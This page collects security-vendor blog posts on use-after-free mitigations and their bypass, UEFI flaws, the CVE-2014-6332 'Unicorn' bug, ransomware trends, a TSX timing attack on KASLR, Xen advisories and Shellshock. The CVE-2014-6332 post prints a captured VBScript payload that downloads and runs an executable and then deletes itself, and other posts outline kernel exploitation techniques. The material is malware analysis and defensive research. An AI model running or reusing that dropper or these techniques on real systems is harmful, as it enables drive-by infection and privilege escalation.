Skip to content
January 17, 2015 / Jared DeMott

Use-after-Free: New Protections, and how to Defeat them

The Problem

Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation where an attacker (malicious user of an application or network protocol) is able to send some data that is improperly processed by the native computer code. That can lead to important control structure changes that allow the attacker unexpected influence over the path a program will travel.

High-level protections, such as anti-virus (AV), have done little to stop the tide. That is because AV is poor at reacting to threats if they do not exist in their list of known attacks. Recent low-level operating system (OS) protections have helped. Non-executable memory and code module randomization help prevent attackers from leveraging memory corruption bugs, by stopping injected code from successfully executing.

Yet a new memory corruption exploit variant called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft’s anti-ROP add-on called EMET, have helped some. But a particularly troublesome bug known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (See Prior Blog HERE). UaFs have been the basis of many current cyber attacks including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required.

The Solution

To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely. (2) An attacker knows about this release and quickly fills that space with data they control. (3) A dangling reference to the original object, which another part of the program assumes is still valid, is used. But of course, an attacker unwittingly changed the objects data. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program.

Microsoft choose to tackle this serious UaF problem with two new protections. These protections work together to stop attackers from being able to allocation new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. A heap is a place that a program uses to create/free internal data as needed throughout execution. This new isolated heap houses many internal Internet Explorer objects. While objects likely to be under the influence of attacks (like strings created via Java Script) will still be allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? So also an obvious weakness with this approach is that with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects.

So Microsoft also created a second cleaver protection. Delayed free operates by not releasing an objects memory right away. In our analogy, if we assume the goal of the naughty kid is to steal the place in line from a good kid that unexpected stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while, before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way even if an attacker knows of an object type on both heaps that could be used to replace the memory backing a dangling reference, they cannot since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are meet: there are no references to the object on the stack and there are at least 100,000 bytes waiting to be freed, or the per-thread call stack unwinds fully to its original starting point.

Evaluation

Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it worked in slowing attackers for a season, but before long each mitigation was bypassed by some clever new attack.

In my research, I show that one such bypass against these new protections involves using what I call a “long lived” dangling pointer. In my naughty child analogy, we can think of this as the sneaky and patient child that can go to either playground, and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a python script to search the core Internet Explorer code module (called MSHTML.dll). The script finds all the different objects, their sizes, and notes rather it is allocated to the default or isolated heap. This information can be used to help locate useful objects to attack either heap.  And with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE.

January 6, 2015 / Rafal Wojtczuk

CCC31 talk about UEFI security

Recently I presented at the 31st Chaos Communication Congress (together with Corey Kallenberg) and presented a talk titled “Attacks on UEFI security”. We described (and demoed) vulnerabilities allowing us to achieve write access to the flash chip (that stores UEFI code) and to SMM memory (that holds the code for the all-powerful System Management Mode). The CERT vulnerability notes are here, here and here ; you are also encouraged to read the presentation, the whitepaper and the second whitepaper.
TL;DR-style, these vulnerabilities are useful for an attacker who already has administrative privileges in the operating system, and wants to install a UEFI-based or SMM-based rootkit. So no, the sky is not falling, and this type of attack is not seen often in the wild. Yet some well knows cases are known, and as the topic gains quite some attention recently, there might be more in the future.

December 4, 2014 / Mantej Singh Rajpal

CVE-2014-6332: Life is all Rainbows and Unicorns

Though just patched earlier this month, the CVE-2014-6332 vulnerability shares it’s age with Yahoo, Neopets, and the hit TV show, Friends. This Windows vulnerability, also known as the “Unicorn” bug, has been exploited in the wild with help of a Visual Basic Script. It impacts almost every version of Microsoft Windows from Windows 95 onwards, and can be exploited in Internet Explorer versions 3 to 11, inclusive. This complex vulnerability gets its name from being extremely rare, somewhat like a unicorn. After all, it’s not every day you come across a unicorn galloping through your front yard.

A lot has already been said about this vulnerability. The bug is caused due to the IE VBScript engine not handling re-sizing an array properly. By abusing this, one can achieve remote code execution, bypassing protections such as DEP and ASLR. To explain the vulnerability in a nutshell – there exists a control flow such that if you request to re-size an array and an error occurs (e.g. OutOfMemoryError), the new size will be maintained (as opposed to being reset). After triggering the vulnerability, you will be able to access the out-of-bound elements of the array. The exploit then uses this vulnerability to perform type confusion. Original IBM Security Intelligence article describes the bug in great detail and a Trendmicro blog walks through the PoC.

Once type confusion is achieved, one could adopt Yang Yu’s approach to leak memory addresses using BSTR. An attacker would just need to change the array’s element type to BSTR and then corrupt its header. This will essentially allow any memory address to be leaked, thus, easily allowing an attacker to determine the location of COleScript – an object holding safety flags for the VB interpreter. Normally, some VB functionality, such as file system interaction and program launching, is restricted in the browser. However, resetting the respective flag allows an attacker to operate within IE as if it was a standalone VB shell.

In fact, the PoC is so straightforward that using it is trivial – one just needs to swap in their VB payload and it’s ready to ship for exploit kits and drive-by campaigns. Last week, we got hold of a Fiddler capture of a malicious web page exploiting this vulnerability.

The VB payload was obfuscated and hidden in a JavaScript snippet on the same page:

obfuscated_payload

The de-obfuscated payload looks like this:

<SCRIPT LANGUAGE="VBScript">
  set shell=createobject("Shell.Application")
  shell.ShellExecute "cmd.exe", " /c echo Set Post = CreateObject(""Msxml2.XMLHTTP"")
  >> c:\\nb.vbs & echo Set Shell = CreateObject(""Wscript.Shell"")
  >> c:\\nb.vbs & echo Post.Open ""GET"", "&nbnburl&" ,0
  >> c:\\nb.vbs & echo Post.Send()
  >> c:\\nb.vbs & echo Set aGet = CreateObject(""ADODB.Stream"")
  >> c:\\nb.vbs & echoaGet.Mode = 3
  >> c:\\nb.vbs & echo aGet.Type = 1
  >> c:\\nb.vbs & echo aGet.Open()
  >> c:\\nb.vbs & echo aGet.Write(Post.responseBody)
  >> c:\\nb.vbs & echo aGet.SaveToFile ""c:\\zl.exe"",2
  >> c:\\nb.vbs & echo wscript.sleep 1000
  >> c:\\nb.vbs & echo Shell.Run (""c:\\zl.exe"")
  >> c:\\nb.vbs & echo Set fsox = CreateObject(""Scripting.Filesystemobject"")
  >> c:\\nb.vbs & echo fsox.DeleteFile(WScript.ScriptFullName)
  >> c:\\nb.vbs & c:\\nb.vbs"
  </SCRIPT>

After the payload launches a shell, it connects to nbnburl (a link to a malicious exe). The server response is saved in the C:\ drive as zl.exe, which is then executed.

It should be noted that during our testing phase, the exploit didn’t work every single time. We conducted a series of experiments where we ran our exploit 25 times, and recorded how many runs resulted in a shell. Our observations indicate success rates ranging from 8/25 to 25/25. Of course, a better experiment could be designed, offering more statistically accurate results. In our case, we were testing to see if the exploit was 100% stable. Turns out, it isn’t. The one exception is IE 11 with enhanced protected mode, which thwarted the Unicorn exploit 25/25 times! EPM is disabled by default due to several compatibility issues, so users must manually enable it under Settings->Internet Options->Advanced, and check “Enable Enhanced Protected Mode” under Security.

For Bromium customers, this attack isn’t any different from other drive-by-downloads – the attack will be isolated and the following LAVA graph will be recorded:

cve_2014_6332_LAVA_graph

This bug really is a special one — it’s reasonably stable, it is able to bypass the security mechanisms implemented in the latest Windows system, and it doesn’t require any 3rd party plugins (such as Java Runtime). Therefore, the impact factor is going to be enormous since it’s unlikely that all users will instantly update their systems.

The question now is, wouldn’t it be safer to simply disable all backwards compatibility features and get rid of the legacy software? The easy answer is yes, but if we scrutinize this matter a bit we can see that it’s not that straightforward. Backwards compatibility is there for a reason – if a software update changes the workflow of an application, users must be given an option to return to their old setup. This minimizes failures that could be caused by the patches.

Unfortunately, there’s no easy solution, and software update management is a huge problem today. Isolation is one viable way to address this issue.

November 19, 2014 / Vadim Kotov

Would you like some encryption with your turkey?

Crypto-ransomware continues to grow and mutate. Yet another family popped up the other day called CoinVault. Like Cryptographic Locker this one is a .NET application although not as advanced as Cryptolocker or Cryptowall, but it apparently does its job reasonably well.
We were wondering recently are there any trends in crypto-ransomware, how does the threat evolves over time and is there any connection between the gangs? So we wrote a report that summarizes our analysis of six ransom Trojans:

  • Dirty Decrypt
  • CryptoLocker
  • CryptoWall / CryptoDefense
  • Critroni/CTB Locker
  • TorrentLocker
  • Cryptographic Locker

We looked at nearly 30 samples and here are the main findings of the research:

  • The latest families target a huge number of enterprise file formats from documents and images to CAD files and financial data instead of just common consumer file types.
  • Crypto-ransomware uses every possible attack vector to get into victim machines.
  • Samples analyzed use fairly complex obfuscation and covert launch techniques that allow them to evade detection on early stages of infection.
  • Communication with command and control servers is encrypted and extremely hard to spot in the network traffic.
  • Cryptography used in the samples analyzed is for the most part implemented correctly and encrypted files are impossible to recover without a key.
  • All recent ransomware accepts payments in Bitcoins only. Apparently there’s a good way of laundering BTC or maybe even a service on the black market.
  • Crypto-ransomware matures and evolves from version to version, additional features are added to ensure that files are impossible to recover (e.g. deleting shadow copies) and flaws are getting fixed.

This threat won’t go away, as long as people pay the ransom, new ransomware families will appear. For the detailed analysis of the aforementioned families read the full report.

Bromium customers should not worry about this threat since we’re able to isolate crypto-ransomware and prevent it from accessing the file system. If a crypto-enabled piece of malware successfully executes inside the micro VM LAVA will produce an attack graph that looks like this:

graph

 

LAVA provides full details of the ransomware activity, the vector used to attack the system and the location of the attackers C&C server. We will continue to track developments with these types of attacks and will provide additional information as it becomes available.

October 27, 2014 / Rafal Wojtczuk

TSX improves timing attacks against KASLR

Mega biblion mega kakon…

… and similarly a long blog is a nuisance, so I managed to squeeze the essence of it into a single sentence, the title. If it is not entirely clear, read on.

SMEP

A typical privilege escalation exploit based on a kernel vulnerabilit yworks by corrupting the kernel memory in a way advantageous for an attacker. Two scenarios are possible:

  1. arbitrary code execution in kernel mode
  2. data-only; just alter kernel memory so that privileges are elevated (e.g. change the access token of the current process)

Usually, the first method is most straightforward, and most flexible. With SMEP enabled, attacker cannot just divert kernel execution into code stored in usermode pages; more work is needed, a generic method being ROP in kernel body.

Kernel ASLR

Usually, both above methods require some knowledge about kernel memory layout. Particularly, in order to build a ROP chain in kernel body, we need to know the base of the kernel or a driver. In windows 8.1 significant changes were introduced to not give to the attacker the memory layout for free. They affect only processes running with integrity level lower than medium, but it is the most interesting case, as OS-based sandboxes encapsulate untrusted code in such a process. The effectiveness of Windows 8.1 KALSR depends on the type of vulnerability primitive available to the attacker:

  1. If one can read and write arbitrary address with arbitrary contents multiple times, there is no problem, as one can learn the full memory layout.
  2. If one can overwrite arbitrary address with arbitrary content at least twice, then a generic method is to overwrite the IDT entry for interrupt Y with usermode address X (note IDT base can be obtained via unprivileged sidt instruction), and then change the type of page holding X so that it becomes a superuser page (possible because page table entries are at known location). Finally, trigger code execution with int Y instruction. I assume it is message of this post, although they do not discuss how to locate a kernel code pointer (meaning, beat KASLR) that subsequently should be overwritten. In some cases we do not need to know the address of the kernel code pointer, e.g. if it lives in an area that we can overflow or alter under use-after-free condition.
  3. If one can just control a kernel function pointer, then… We can divert execution neither to usermode (because of SMEP) nor to kernelmode (because of KASLR we do not know addresses of any ROP gadget). Any hints?

Recently I played with a vulnerability from the third category, and (at least for me) KASLR provided significant resistance. It can be argued that there is potential for kernel bugs that leak some pointers and thus allow to bypass KASLR, but something more generic would be better.

Timing attacks against KASLR

An excellent paper describes methods to bypass KASLR via timing attacks. One of the discussed methods is: in usermode, access kernel address X, and measure the time elapsed until the usermode exception handler is invoked. The point is that even though usermode access to X throws a page fault regardless whether X is in mapped kernel memory or not, the timings are different. When we recover the list of mapped pages, we can infer the kernel base (or some driver base) and consequently the addresses of useful code snippets in it – all we need to build a ROP chain.

Timing attacks need to take care of the inherent noise. Particularly, on Windows invoking the usermode exception handler requires a lot of CPU instructions, and the difference in timing can be difficult to observe. It would be much better if the probing did not result in the whole kernel page fault handler executing. Any hints?

TSX to the rescue

Haswell Intel CPUs introduced the “transactional synchronization extensions”. It means than only recent CPUs support them; moreover, Intel recommends disabling them via microcode update, as they are apparently not reliable. Yet we may assume that someday they will be fixed and become widespread.

TSX makes kernel address probing much faster and less noisy. If an instruction executed within XBEGIN/XEND block (in usermode) tries to access kernel memory, then no page fault is raised – instead transaction abort happens, so execution never leaves usermode. On my i7-4800MQ CPU, the relevant timings, in CPU cycles, are (minimal/average/variance, 2000 probes, top half of results discarded):

  1. access in TSX block to mapped kernel memory: 172 175 2
  2. access in TSX block to unmapped kernel memory: 200 200 0
  3. access in __try block to mapped kernel memory: 2172 2187 35
  4. access in __try block to unmapped kernel memory: 2192 2213 57

The difference is visible with naked eye; an attack using TSX is much simpler and faster.

Two points as a take-away:

  1. KASLR can be bypassed in an OS-independed way; this post describes how the existing techniques can be improved utilizing TSX instructions.
  2. The attack is possible because of shared address space between kernel and usermode. Hypervisor has a separate address space, and therefore it is not prone to similar attacks.
October 1, 2014 / Rafal Wojtczuk

Musings on the recent Xen Security Advisories

As all careful readers of this blog certainly know, the Bromium vSentry hypervisor (uXen) has been derived from Xen. It means parts of the codebase are shared between the two projects, and vulnerabilities found in Xen sometimes are relevant for uXen. The two recent Xen Security Advisories, XSA-105 and XSA-108, are not particularly severe (at least for vSentry), but feature interesting details related to generic hypervisor hardening that are worth discussing. One may wish to read the original Xen advisories before proceeding.

XSA-105

The title of advisory is “Missing privilege level checks in x86 HLT, LGDT, LIDT, and LMSW emulation”. The impact (for Xen) is ability of an unprivileged VM usermode to elevate to VM kernel.
In some scenarios when CPU cannot execute an instruction in a VM properly (because e.g. this instruction touches memory-mapped register, and has device-specific side effect) Xen emulates the instruction. The problem is that the code responsible for emulating the above instructions did not check whether CPU was in kernel mode. Particularly LGDT and LIDT are normally available for kernel mode only, as they change the crucial CPU registers. Because of the vulnerability, user process in a VM (even one with very low privileges, e.g. Untrusted integrity level in case
of Windows) could effectively execute LIDT or LGDT and take full control over VM.

Exploitation is straightforward in case of Windows 7, one can just create a fake IDT table in usermode, and kernel will transfer control to attacker’s code (residing in usermode pages) upon the first interrupt. On Windows 8 running on CPU featuring SMEP, attacker needs a bit more work and create a ROP chain in kernel – fortunately for an attacker, at the entry to the [software] interrupt handler, all general-purpose registers are controllable, so it is easy to achieve the stack pivot.

It is remarkable that in fact, no sane OS needs support of emulation of these instructions in normal circumstances. Still, a complete emulator imported into Xen is available throughout VM’s lifetime, resulting in a vulnerability. In the early days of uXen development, it was recognized that the emulator constitutes an attack vector, and a conscious effort was made to reduce the number of supported instructions. Therefore, uXen is not vulnerable – when an exploit is run in a vSetry microVM, the emulation is denied (with a message
(uXEN) c:/br/bld/uxen/xen/uxen/arch/x86/x86_emulate/x86_emulate.c:1383:d187 instruction emulation restricted for twobyte-instruction 0x1
in the logs) and the microVM is killed.

To sum up, Xen users should worry about this vulnerability if they run untrusted code in their VMs (think sandboxed code) and care about privilege elevation within VM. uXen is not affected.

XSA-108

The title of the advisory is “Improper MSR range used for x2APIC emulation”. The impact is that a malicious VM kernel can crash Xen or read up to 3K of its memory, from an address that is not under control of an attacker.

The root cause is that the code responsible for emulation of access to local APIC registers in x2APIC mode supported 1024 registers, but allocated buffer space for 256 registers only. If a write access (by wrmsr instruction) is requested by VM, no harm is done, as only a limited number of known registers are actually emulated. On the other hand, the code implementing read access emulation just reads from the vlapic->regs buffer (that is one page long), at an offset controlled by the attacker (must be less than 16K).
Consequently, memory located up to 12K after the vlapic->regs buffer is read and returned to the VM. More precisely, 4byte-long integers located at 16bytes-aligned addresses can be read. If the virtual addresses adjacent to vlapic->regs buffer are unmapped, this results in Xen crash; if they are mapped, their contents leak to the VM.

The vulnerable code is present in uXen. uXen uses a specialized memory manager (dubbed memcache”), that preallocates a large contiguous virtual memory range for the purpose of mapping VM-related pages. As a result, uXen crash is unlikely, it can happen only when the vlapic->regs buffer is mapped near the end of the memcache.
Similarly, the information leak is somewhat restricted – memcache stores only pages allocated for uXen purposes, therefore (if we neglect the unlikely “end of memcache” scenario) there is no possibility that unrelated host’s kernel memory can leak to the microVM. In the common case, memcache assigns consecutive virtual addresses for mapping of subsequent page allocations. During microVM setup, the order of allocation is such that the three pages allocated
immediately after vlapic->regs allocation store VMCS, VMCS shadow and MSR bitmap pages. Therefore, in the common case, all the atacker can achieve is leaking lower 32 bits of pointers from VMCS, which might help to deduce the ALSR layout of the host kernel. This is not a catastrophic problem in itself, but it can aid in exploitation of another unrelated vulnerability. In a corner case when microVM creation races with heavy map/unmap operations done on other microVM’s memory, this memory would leak to the attacker as well.

To sum up, this vulnerability has potential for crashing the whole hypervisor or leaking limited amount of data from hypervisor.. This is not very severe impact, although if one runs multiple VMs of different origin on the same host and is very serious about possibility of leaking data (even small amount from an location not controlled by an attacker) from one VM to another, prompt patching is justified. Interestingly, there was quite some concern in the media about this vulnerability, but it was clearly overhyped.

Interestingly, vSentry microVMs use xAPIC mode, not in x2APIC mode. The vulnerability can be exploited only in x2APIC mode. It means that an attacker needs to enable x2APIC mode first. However, this results in microVM OS being unable to use APIC, and hang in IPI processing. In order to exploit this vulnerability repeatedly for more than a few seconds, attacker would need to patch VM OS to use APIC in x2APIC mode, which is far from trivial, yet imaginable.
It also means we missed a generic hardening opportunity – we should support only a single APIC mode. There is still room for improvement, but considering that since the release of the first vSentry version there was no vulnerability in Xen allowing for escape from VM that would affect us, it looks we have done a fairly decent job.

September 26, 2014 / Jared DeMott

The Mysterious Life of Benjamin Bash

In a time of shaggy beards, thick glasses, and bell bottomed trousers, was Bourne[i] a way to command the beasty called Unix.  But as is always the way with humans, enough is never enough.  As such, a fancier champion Bashed[ii] onto the scene.  And for many years, Mr. Benjamin Bash served rich and poor alike, in the kitchens of Apache[iii] and countless other dens[iv].

Now as always, dragon slayers[v] comb our lands, searching for kingdom weaknesses.  And of course, our faithful Mr. Bash was never considered a fault.  But his obscure injection[vi] wouldn’t lie dormant forever.  Nay!  One brave warrior, Sir Chazelas[vii], discovered that when ye place an order with lovely CGI[viii] maids, one can also pass an environment[ix] note, which causes Mr. Bash to do unexpected things.  Indeed, in vulnerable establishments, Bash will do whatever ye ask[x].  Even hand over the keys to the castle!  Aye, it’s a sad affair, with grave consequences[xi].

But take heart laddie, and listen up.  We’ve vital information.  Examine the following attack:

bashsmah_pic_2

The smart student would note that for the agent of doom to achieve its nefarious function[xii], some key bits must transfer across our moat[xiii].  The evil parts of the message are the letters “() {“.  I say, our border guards[xiv] should be informed about the matter.  And better yet, we should hastily patch[xv] Mr. Bash to insure he acts properly, and ignores such outsider suggestions.  Sadly some of our smaller holds[xvi] may not receive the message for some time, if ever.

So, with this unsavory matter behind, the mysterious life of Mr. Bash goes on.  But the enemy forces are wily.  They’re schemin’ and plotting as always.  I say let’s do a thorough run down of our defenses, check the checkers, and make sure we’re ready when next our dastardly foo return.

 

Protip: Article best read aloud with a pint and a thick Irish or Scottish accent

[i] http://en.wikipedia.org/wiki/Bourne_shell

[ii] http://en.wikipedia.org/wiki/Bash_(Unix_shell)

[iii] http://en.wikipedia.org/wiki/Apache_HTTP_Server

[iv] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

[v] http://www.alienvault.com/blogs/security-essentials/the-life-of-a-security-researcher

[vi] http://en.wikipedia.org/wiki/Code_injection

[vii] https://lists.debian.org/debian-security-announce/2014/msg00220.html

[viii] http://en.wikipedia.org/wiki/Common_Gateway_Interface

[ix] http://en.wikipedia.org/wiki/Environment_variable

[x] http://shellshock.brandonpotter.com/

[xi] http://www.scmagazine.com/linux-and-os-x-flaw-may-have-greater-impact-than-heartbleed/article/373743/

[xii] http://unix.stackexchange.com/questions/157329/what-does-env-x-command-bash-do-and-why-is-it-insecure

[xiii] http://en.wikipedia.org/wiki/Trust_boundary

[xiv] https://www.owasp.org/index.php/Web_Application_Firewall

[xv] https://bugzilla.redhat.com/show_bug.cgi?id=1141597

[xvi] http://en.wikipedia.org/wiki/Internet_of_Things

Follow

Get every new post delivered to your Inbox.

Join 50 other followers